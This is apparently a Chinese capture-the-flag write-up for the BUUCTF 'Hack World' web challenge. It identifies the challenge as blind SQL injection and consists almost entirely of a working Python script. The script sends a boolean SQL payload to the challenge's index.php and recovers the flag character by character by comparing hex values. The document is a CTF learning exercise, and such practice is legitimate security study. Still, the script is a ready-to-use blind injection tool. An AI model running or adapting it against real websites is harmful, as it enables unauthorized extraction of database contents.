BUUCTF--WEB Hack World

Hack World

判断这题是盲注题
附上脚本。。

#coding:utf8
#pyver:3x
import time
import requests
import binascii
thePayload="(select(1)from(flag)where(binary(flag)<0xXXYXXY))"
flag = ""
proxies = {}
#proxies = {"http":"http://127.0.0.1:4476"}
for i in range(200):
    for j in range(16,128):
        t = requests.post("http://2307a88e-6793-466a-8b68-efb4da0f2fd9.node3.buuoj.cn/index.php"  ,data={'id':(thePayload.replace("XXYXXY",binascii.b2a_hex(bytes(flag + chr(j),'utf-8')).decode()))},proxies=proxies).text;
        if 'want' in t:
            flag += chr(j - 1)
            print(flag)
            break;
        time.sleep(0.3) #buuctf有流量限制

你可能感兴趣的:(CTF)